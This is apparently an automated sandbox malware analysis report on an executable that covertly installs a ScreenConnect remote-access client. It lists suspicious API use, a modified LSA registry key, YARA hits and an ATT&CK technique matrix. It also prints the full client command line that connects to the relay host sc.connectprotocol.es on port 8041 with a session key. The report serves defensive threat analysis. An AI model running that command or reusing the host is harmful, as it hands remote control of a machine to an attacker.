                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeMemory allocated: page read and write | page guardJump to behavior

                                  HIPS / PFW / Operating System Protection Evasion

                                  Source: 0.2.tiG6Ep202n.exe.3140000.0.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                                  Source: 0.2.tiG6Ep202n.exe.5880000.7.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                                  Source: 0.2.tiG6Ep202n.exe.5880000.7.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                                  Source: 0.2.tiG6Ep202n.exe.5880000.7.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                                  Source: 0.2.tiG6Ep202n.exe.5880000.7.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                                  Source: 0.2.tiG6Ep202n.exe.5880000.7.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi"Jump to behavior
                                  Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (a532d472f1ff1d4e)\screenconnect.clientservice.exe" "?e=access&y=guest&h=sc.connectprotocol.es&p=8041&s=16dcb7ee-2b94-4a51-a426-55c28e344f1f&k=bgiaaackaabsu0exaagaaaeaaqc1kwkbpg72shug%2fcugwqb7iuebcyny1kcdtceo3n0ry4axiph%2ffmztln0b%2bg2miuqorkgq0xsvxj7wucz%2bdiimwdt7qllgfko33osoqisfilkobrosqmoo0cyg%2fpkva7aaau%2bym8zey9okpyj7knkvh679krkgwwm5tfc%2fbhzztt1d5pfiewfvi67rlcagqxh1hudy%2bbdi6lg6r8m8lqczrbhxazj%2fuvxvugxn6zwttc7e00yjiy6fpwniox5ej%2fn2ux9gcwu%2bpspaixxjhoyehv84bhaut0rgc1re8m9puttx9udji37opbolw%2f5qq735uizmwagufhfj%2flzeryvq&t=old-01"
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2206952952.00000000007E2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Progman
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2206952952.00000000007E2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_04F80CC8 CreateNamedPipeW,8_2_04F80CC8
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_00BF4C71 RtlGetVersion,8_2_00BF4C71
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\msiexec.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
                                  Source: Yara matchFile source: tiG6Ep202n.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.2.tiG6Ep202n.exe.5a60000.12.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.2.ScreenConnect.WindowsClient.exe.2acfa18.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.7e0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.tiG6Ep202n.exe.5a60000.12.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 11.2.ScreenConnect.WindowsClient.exe.28bfa50.4.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.tiG6Ep202n.exe.b45db0.3.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.tiG6Ep202n.exe.b1c3d4.5.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.tiG6Ep202n.exe.a963d4.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.tiG6Ep202n.exe.a80000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.2173892307.0000000005A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000009.00000002.4011949358.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000009.00000000.2206952952.00000000007E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.2178858378.00000000068B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000000.2138892674.0000000000A96000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000002.2258615488.0000000002841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: tiG6Ep202n.exe PID: 5500, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1588, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 504, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 672, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFA2315AC072D60478.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF05F0D14B49496305.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFA01B11556604F6BD.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF5F6339E16C6791FF.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFB9D17362A4D0E7A8.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFE4D607A3416BF7CD.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Config.Msi\6699fe.rbs, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Installer\MSI9C5F.tmp, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                  Gather Victim Identity InformationAcquire Infrastructure1
                                  Valid Accounts
                                  31
                                  Windows Management Instrumentation
                                  1
                                  DLL Side-Loading
                                  1
                                  DLL Side-Loading
                                  11
                                  Disable or Modify Tools
                                  OS Credential Dumping11
                                  Peripheral Device Discovery
                                  Remote Services11
                                  Archive Collected Data
                                  2
                                  Encrypted Channel
                                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomains1
                                  Replication Through Removable Media
                                  1
                                  Native API
                                  1
                                  DLL Search Order Hijacking
                                  1
                                  DLL Search Order Hijacking
                                  1
                                  Deobfuscate/Decode Files or Information
                                  LSASS Memory1
                                  File and Directory Discovery
                                  Remote Desktop ProtocolData from Removable Media1
                                  Non-Standard Port
                                  Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts12
                                  Command and Scripting Interpreter
                                  1
                                  Component Object Model Hijacking
                                  1
                                  Component Object Model Hijacking
                                  1
                                  Obfuscated Files or Information
                                  Security Account Manager55
                                  System Information Discovery
                                  SMB/Windows Admin SharesData from Network Shared Drive1
                                  Non-Application Layer Protocol
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal AccountsCron1
                                  Valid Accounts
                                  1
                                  Valid Accounts
                                  1
                                  Software Packing
                                  NTDS41
                                  Security Software Discovery
                                  Distributed Component Object ModelInput Capture1
                                  Application Layer Protocol
                                  Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchd2
                                  Windows Service
                                  1
                                  Access Token Manipulation
                                  1
                                  DLL Side-Loading
                                  LSA Secrets2
                                  Process Discovery
                                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                                  Bootkit
                                  2
                                  Windows Service
                                  1
                                  DLL Search Order Hijacking
                                  Cached Domain Credentials61
                                  Virtualization/Sandbox Evasion
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items13
                                  Process Injection
                                  1
                                  File Deletion
                                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job122
                                  Masquerading
                                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                  Valid Accounts
                                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                                  Access Token Manipulation
                                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd61
                                  Virtualization/Sandbox Evasion
                                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task13
                                  Process Injection
                                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                                  Hidden Users
                                  GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                                  Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                                  Bootkit
                                  Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                                  Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                                  Rundll32
                                  Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
[Behavior graph. ID: 1567468; Sample: tiG6Ep202n.exe; Start date: 03/12/2024; Architecture: WINDOWS; Score: 44]

Source | Detection | Scanner | Label | Link
tiG6Ep202n.exe | 26% | ReversingLabs | Win32.Trojan.Generic

Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | 0% | ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | 0% | ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | 0% | ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll | 0% | ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll | 0% | ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsAuthenticationPackage.dll | 0% | ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsCredentialProvider.dll | 0% | ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI9606.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.Compression.Cab.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.Compression.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.WindowsInstaller.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.Core.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.InstallerActions.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.Windows.dll | 0% | ReversingLabs
C:\Windows\Installer\MSI9C7F.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSIA097.tmp | 0% | ReversingLabs
                                  No Antivirus matches
                                  No Antivirus matches
                                  No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
sc.connectprotocol.es | 38.69.12.167 | true | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
                                    https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000A.00000003.2233323680.0000027B7C2D0000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.drfalse
                                      high
                                      http://crl.ver)svchost.exe, 0000000A.00000002.3879697188.0000027B7C400000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://wixtoolset.org/releases/rundll32.exe, 00000005.00000003.2166340137.0000000004F83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166340137.0000000004F14000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166528725.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                          high
                                          https://g.live.com/odclientsettings/Prod1C:qmgr.db.10.drfalse
                                            high
                                            http://wixtoolset.org/news/rundll32.exe, 00000005.00000003.2166340137.0000000004F83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166340137.0000000004F14000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166528725.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametiG6Ep202n.exe, 00000000.00000002.2150232291.0000000003171000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.4013580934.0000000001364000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258615488.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000005.00000003.2166340137.0000000004F83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166340137.0000000004F14000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166528725.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                                  high
                                                  https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.3.drfalse
                                                    high
                                                    https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsCredentialProvider.dll.3.drfalse
                                                      high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
38.69.12.167 | sc.connectprotocol.es | United States | | 54583 | 54583US | false

IP
127.0.0.1
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1567468
                                                      Start date and time:2024-12-03 16:19:17 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 9m 41s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Run name:Run with higher sleep bypass
                                                      Number of analysed new started processes analysed:14
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:tiG6Ep202n.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:58dff1cfcae1349d3e7cc009fb0cf1c109bdb4a5f3d2f8101ff9bd61d514a811.exe
                                                      Detection:MAL
                                                      Classification:mal44.evad.winEXE@18/58@1/2
                                                      EGA Information:
                                                      • Successful, ratio: 60%
                                                      HCA Information:
                                                      • Successful, ratio: 67%
                                                      • Number of executed functions: 355
                                                      • Number of non-executed functions: 2
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                      • Excluded IPs from analysis (whitelisted): 23.218.208.109
                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target rundll32.exe, PID 1588 because it is empty
                                                      • Execution Graph export aborted for target tiG6Ep202n.exe, PID 5500 because it is empty
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                      • VT rate limit hit for: tiG6Ep202n.exe
                                                      No simulations
                                                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                      38.69.12.167 | f53WqfzzNt.exe | malicious | ScreenConnect Tool |
                                                      38.69.12.167 | 6IqUjK9Koj.exe | malicious | ScreenConnect Tool |
                                                      38.69.12.167 | hB52OUUCE2.exe | malicious | ScreenConnect Tool |
                                                      38.69.12.167 | lCwus2wfk6.exe | malicious | ScreenConnect Tool |
                                                      38.69.12.167 | pbenHWj8JO.exe | malicious | ScreenConnect Tool |
                                                      38.69.12.167 | 1g6DULljd2.exe | malicious | ScreenConnect Tool |
                                                      38.69.12.167 | 2nmtr41l0S.exe | malicious | ScreenConnect Tool |
                                                      38.69.12.167 | pbenHWj8JO.exe | malicious | ScreenConnect Tool |
                                                      38.69.12.167 | lCwus2wfk6.exe | malicious | ScreenConnect Tool |
                                                                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
